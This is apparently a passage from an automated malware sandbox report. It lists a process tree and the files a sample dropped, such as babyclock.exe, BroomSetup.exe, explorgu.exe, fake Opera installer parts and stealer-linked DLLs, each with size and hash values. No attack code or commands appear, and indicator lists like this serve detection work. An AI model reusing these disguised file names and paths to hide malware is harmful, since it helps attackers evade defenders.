                                                                                                                                                                                              PID:6000
                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                              explorer.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4844
                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4468
                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                  explorer.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:2320
                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:3460
                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                      explorer.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:1392
                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:4164

                                                                                                                                                                                                        Network

                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                        • C:\ProgramData\Are.docx

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          11KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                                                        • C:\ProgramData\DHJDAFIE

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          92KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          4c2e2189b87f507edc2e72d7d55583a0

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          1f06e340f76d41ea0d1e8560acd380a901b2a5bd

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          99a5f8dea08b5cf512ed888b3e533cc77c08dc644078793dc870abd8828c1bca

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          8b6b49e55afe8a697aaf71d975fab9e906143339827f75a57876a540d0d7b9e3cbbcdd8b5435d6198900a73895cc52d2082e66ee8cec342e72f2e427dde71600

                                                                                                                                                                                                        • C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          aa590645e033ea8f8470a1b45ee309d5

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          b1fdc29f7f90edb21ae265f2a2f1b269d08c3423

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          378bbecf4372e7162b2c97e6331fb67a5c030e2d2976c5343a168f1d73cab216

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          25582d41b161917cdad4ba545602378351005e7df1d9f9857eaef6133c52695702dfbbd611818dc3877532b2a4607f69aa90e6aa8b08f13db9f3df49b0843b93

                                                                                                                                                                                                        • C:\ProgramData\FCAEBFIJ

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          220KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          302e7bb88e0ca2e0a4b0fcb784f8e921

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          79304b5359b5a5ffa222a48373d214ff7bdca8e9

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0583a074f22df06e2e66267c0cd1789e77849b6e7efaf9409baf814e95374f7b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          b15a5c71ba415d794690d49ba1585866a88e3d437c95c5e78f057a22108c6018441df3ee4a66b05133999fb42a043423317792f785ac2d42c8a73bee33c805b6

                                                                                                                                                                                                        • C:\ProgramData\Google\Chrome\updater.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.6MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          3d233051324a244029b80824692b2ad4

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a053ebdacbd5db447c35df6c4c1686920593ef96

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          fbd467ce72bca00eea3aaa6f32abc8aca1a734030d082458e21e1fe91e6a8d84

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          7f19c6400ac46556a9441844242b1acb0b2f11a47f5d51f6d092406a8c759a6d78c578bb5b15035e7cd1cdb3035acf0db884708b0da1a83eb652a50a68e3a949

                                                                                                                                                                                                        • C:\ProgramData\OutStep.txt

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          693KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          74969bd8528b1b57ffca52e0bc7b3b54

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          ecc0a25b31ba6c60c1125693a027bc9cb401c707

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          03552373b313b775ae58f0c3cc4bdc9e4fa640ad0763c58188b761d1395a8bc2

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          608a98eb531e417b99f5cfc6069ca5220b6ffe2624ca7b3c2e2c379a2595716b55f08906f3a6289ff4a485bfcd72def5cf4ae8ca58aa84e2b483fa48c1b38006

                                                                                                                                                                                                        • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          593KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                        • C:\ProgramData\nss3.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.0MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0b4b6144c0d7281a4d2e34e44199d0c5

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          09c4e8d1a63e301444d01223ffc6d2b1a86173b3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          47dc2d1974e63e35b98b757796e6ff73eacafd5ccf9cb77ec09ed6911c45ad4b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          7c8ba0af622290dde8cec2a958764b17864bcdc92fcee8820dbaac9cf271d6bb46dc0a350c67f09f9fe37ad45362c72f6d339e6683f5f7abf361c4a6be90db81

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ddf5fe475916a430fb18941d19c89211

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          d31eebd92782de2e18be0c0a2d022a78ca4e74be

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          6e69754e03ca086758cd9c99afc004ca90d50b47e695addadaee64020311c8e9

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          5f853ffb1ca02b5224223d85c83acb4f1ff05065e2854b601cd8c72ba5912786d4980a48e0c82676b51a75a922b6441a34c11209c70b9d95c347d28982ba0386

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          984KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          81de79f779f7485a323903718d959374

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          3baee3a8ea2d1451064c00ef2fdad79404a2565d

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          deca6bfd0957e2ee8d1dbb08e545a20d63e0cdb691873aa42ebbaa70c0c0f61b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          dc5dbb1ca1e643d7880a7257293bf834f1e0c00cad08d6d2aa66fbd68826d5a92f8ac3326f128f0be194141b12932740368dd9c415f1384ca7745310ed4a6703

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\BABY-Clock\is-MLNLP.tmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          122KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6231b452e676ade27ca0ceb3a3cf874a

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          f8236dbf9fa3b2835bbb5a8d08dab3a155f310d1

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          9941eee1cafffad854ab2dfd49bf6e57b181efeb4e2d731ba7a28f5ab27e91cf

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f5882a3cded0a4e498519de5679ea12a0ea275c220e318af1762855a94bdac8dc5413d1c5d1a55a7cc31cfebcf4647dcf1f653195536ce1826a3002cf01aa12c

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          47b22c695811b64b1c8ff3933f9ea6da

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          546e84c0f5b0062701a52f7fa7c22db48cc73cfd

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a560208d6f4bc9b797926c8621f3657071918c88389c31e5a8a8851bb77bac07

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          a5342e8b3be45e1487f3356827796852c51c783d262ecebed6636402f38c40786027d10f9979135dda528ccb6e6d4931f92177a1c9e0d91da37919034268ac40

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          d751713988987e9331980363e24189ce

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          40B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          20d4b8fa017a12a108c87f540836e250

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          1ac617fac131262b6d3ce1f52f5907e31d5f6f00

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\additional_file0.tmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          20d293b9bf23403179ca48086ba88867

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          dedf311108f607a387d486d812514a2defbd1b9e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          622KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          10ab819cc1fd05db944a461213acf560

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          c2e41cb4d74e28351437f7a879bea3355c210ebf

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          ea86bedcce197838b0817719f395b9fdc978d4b07be79703e2e0aae11212dd8e

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          67ec7a885445de734e96545fc1646b6a86727c1d62ebde530ff3e1f0fe7d0afa5b9ca27d1b293f26f802358052bf46ad2815084c763d8678bd05148ac2d46512

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          192KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          7b1d5aaede95bc464a6bc0494c0ffe07

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          8f1147308a389eb9aded7aec9eba9cbce2e25839

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          193d24c87e4f2c8ef05ae9b3b9c4e10248b9add7a38f228b4c6ebcf161bcb40c

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          4ff9827818a7ac021383293dfb061ad0a6a5430ea38908c1a7243f06ae5c530a34fb5d2c69ff15ed23eadd62d27a5a6627a8549d9f1a09585d5ea8b53753d1d8

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbgcore.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          51KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          e06f8bf58534ef7c5124c4f78e7a07dd

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          c9d2e9f84318de88cd94e12d8a8635ff248b7190

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0fc30d71b17cb17dab1088cb80aff056f64e59fa2c3f2b54d384bd8be34cba06

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f822eb539e027dc508142cf6188b6bff1fa098bd2dd7811fb9ed90031f3d2ecf56cdcef753e2563d06889a01c0a172c929826e59a2891676361558939315bccd

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbgcore.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          166KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          8b6f64e5d3a608b434079e50a1277913

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          03f431fabf1c99a48b449099455c1575893d9f32

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbghelp.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          375KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          d9898f7b271fb93f85edc56f6eb12df2

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          dbbfa79af1636cb95cf1fc60c5bd5cfef3d1ffd7

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          7928244d487f29c60473295382bd2978ef80ad72a578d6fa6201d28d79d63b68

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          fe5540f0805a24d40aefc4476ed0fe5daa48a3f0f02073eead782a8ba8d39f53407456746ce8b341c076fafc5d79457922d04caf202edcad059a421b08ece16b

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbghelp.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          bfeb92b427ed6d61a15de77c52d5b361

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          19e8a46b84041f30279a3470765d027279dde58e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          d7f1d277b2493e73efeec2f396907bf6eb2d7da2b04d940801cc62486d2c0533

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          3274a96a7a78d7468c698aedf9829983afc6eed67a20a4ee9b3fb9a95e6e23af2be422c151d0b3a7c47eaec68719d27c516130d909dda16abe73fdf5494a8479

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbghelp.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6ee8b6a773f68a59355ce01c8466b2ff

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          88cd545c2b9cc8f497e9f838d1dcbd029a753689

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0734fa38d671afe3b31989f8fc560320269a9aab00a60458aada68366758dff9

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          5f2b88e257afebc8a274038940a47af9af1b301d2ffaf2df8105ad5140af9379c08024931b6f4202da9cc2f4b16dbee25e37f21e11f40fea956f2c0dc93278b0

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\opera_package

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.8MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          8e234ebc7ada13a83034ede749b0bad2

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          6e921c590fab1b79ad1074451a7e3933b50a5733

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          dc1edcb62279d45c8cf2bd99b56b6c9cd2042b11783057bd014c87819b9e21b9

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          1d89b764cec9a306e0ba06e65eb4917570a5bd85d265c1c4da5d319f4fb34c3346f20a695f1dcff9e6fd6cae6d57299fbb0f808b3686126728f38d58f9289741

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tJ6HSphWPkDhrW4fuBx7FKRM.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          448KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          db04f566eaffca5474d03ead0a08a16a

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          898508ca54f12193cc1e3085b2debfb4f23f7cde

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          14a1853237ca0895d78461ee94572b6d7e56e4f3f6e1d692b824ac904aea09a0

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          21caf496d3f0977f30ce1007da4fd0256a04afa68928fae15e93da976038895bd9c1e665e96e17aa14bc0e530aad1ef3a6b74a55a898c22b9fbdcffbdf8a700f

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.9MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          3960abf1cf1e42dee448bcd6d09381b1

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          1c92cad57ae12fa79d31b3a61560c0ac82cdda24

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          9175e09343e8232774e9e74dc214ca5a1348ee88146ab9ea1f4c44d48905736c

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          9e72eb8035d578f3a473d8907d8058cd84eb7f8f1e8e9caa512a87aebbffce7a302af95a030a919408ac050d7fdd0f962e9c4f59ba89963508951ad546accfd9

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\85CB.bat

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          77B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          55cc761bf3429324e5a0095cab002113

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          2cc1ef4542a4e92d4158ab3978425d517fafd16d

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          751f807e555a1c06dd2b8cb1f5297de8

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          7e0af7a0df81bf657d7a46372cab7ead49efdc28

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          79a3d83590ba6ff505d255c855093cb41c1185c35e437bee3d2d8652a5839c3c

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          92ee075e84fa1a4e905e50f9ae8e13f62eeccbc786f31eb41595fe76cc9e99d1d32ab7bc0fc9c669355635f18bea9bc5822243c277ab8a1ddaac1a6f3ba7515a

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a2b2f656091bb79ee7eb0b611586dc48

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          20a5125cbaa17ce8af0204d6a5bd5f3e3091d5d6

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a56f88f780c62fee5b76c4f6e141eca1a89c1b0ee43bf8a47aaf604637b322ca

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c0181120d0de96329eea40a5a051458c5a73853fd43c1fa51c5417ec10455c77354d3329d5176a3f6674a34de5ecf1212171a601b135fffd73042af6207e0165

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403101628247145344.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          860KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          1239dc413710dc3e6bbfcf32ffc33efd

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          84d3773b02c6497bdd24b169c4c36d19d7875c9f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          76b9870d934a7cfc3e40250ed18a84986a5f3fcae92679d0bd0e63a0861895f3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          e54fd7492f69d8d56ce26fbeb29b25dcdf0acf817f504c8636517d2969ed37eac7179103caae6c546b0ff45ad8930993dbc7e1695e9becd3cbbbabbd50790ee3

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Opera_installer_240310162825980512.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          47be4c368799211d8dda2f7c9a0e96bd

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a1003e84583b81a88017d25f5df4879cb9d39ff3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          71e172458d0c5a040b80db23b8cf03c967591d1c5c018bbb5eeabf40de755226

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c45b28e139e372fa34c358c11c02616f606fac2dedec2c91237cce1c87a048a9a09e967ae913aaedf847ffa88712dcb871ea6e26950ecdc905c7b1d4aba54aa3

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Opera_installer_240310162825980512.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          795KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          7a496d7595245941d996710655550f38

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5e413711837e98c9173b1ab22cb4df86ca00399f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          ac01e3d6edc1cb762ea8851e0e05898a2572b973982f0d3a991f6a3ae80c0b83

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          14585a5a81a3089ec930ea38154fe609fba2b05d3f10619419c7d3a45d6c5370ae808b7f24f808c0ff4fed3b0673b0d842b13ead67d9f235264d5c81198e3d7e

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403101628277611752.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          835KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          30eac5d4c6b84099856e93d05529e3b8

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          abdae941bd97fdd3445f66b1e21461fc19d653aa

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          c27b8d60a49df50834fe4e2fa37c8221972d5b860f4f4a15b87f9e76cda4dc2c

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          88d5651ee8bdb1e70316c154c1478f59a7f2898bc22ad5ec004123ae49fe3c8e6f17bbd1e960698ea3a8ecd2f87161d8ef987fcc16b871dffb9ca4e556134fe1

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Opera_installer_240310162829073912.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          270KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          f48e89ca1c4ea9e1c5b935a5c94abf4e

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          cb565360bbc6a7172eb265a63644f61c9127d404

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          cb860a120cf487c8e738580622f3a8e9367e24c737d0501d28dcbcd98f69a8cc

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          aa15a00bf222fa7ca44d952a1e6a829346dcfecdf8443d27af0aac8607b00a4a033b59e69e911e51bb62acba1c929aac30678fe097ae1d6f18afb107223a6b46

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403101628296833720.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          709KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          f3d5c951d70fe9039784f2313881ea17

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          f8e161f5b6c8c757bce9ec48e4b017e70cf248b2

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          2de360ce6affca2cd16ebd93aa2d86d813e6a0aed23f3455000f2f1f70745438

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          aa4f791b42fa26dfd4856e5d5e70fe2b81bee2dd13063dd1ef5f4d1e5c208aa91f49bea5478f28ba3582f1fdae2ddec1d0a9d90cd199e34403152b94f8bab06d

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cc3tfo5w.cno.ps1

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          60B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                          SHA256

